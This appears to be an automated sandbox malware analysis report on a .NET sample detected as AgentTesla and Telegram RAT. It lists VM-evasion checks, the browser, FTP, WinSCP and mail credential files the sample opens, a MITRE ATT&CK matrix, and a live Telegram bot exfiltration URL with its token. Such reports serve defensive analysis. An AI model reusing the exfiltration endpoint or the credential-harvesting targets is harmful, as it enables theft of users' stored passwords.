Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Memory allocated: 24D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2888404652.0000000000A64000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.00000000026BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, type: SAMPLE
Source: Yara match	File source: 0.0.17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1640779480.0000000000242000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2889163730.0000000002671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe PID: 3872, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Input Capture	111 Security Software Discovery	Remote Desktop Protocol	1 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	11 Archive Collected Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	2 Data from Local System	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	63%	Virustotal		Browse
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	100%	Avira	HEUR/AGEN.1305739
17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://account.dyn.com/	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	false	high
https://api.telegram.org	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026C6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot6407972891:AAEvOm4dEtVGh3Nk7hoxcq00ys_9pap2veU/	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe	false	high
http://api.telegram.org	17139463270174bbf69f15eda1f7b69a4b102fdecfdf8a3128c52442f9358945f33688d60f824.dat-decoded.exe, 00000000.00000002.2889163730.00000000026DA000.00000004.00000800.00020000.00000000.sdmp	false	high
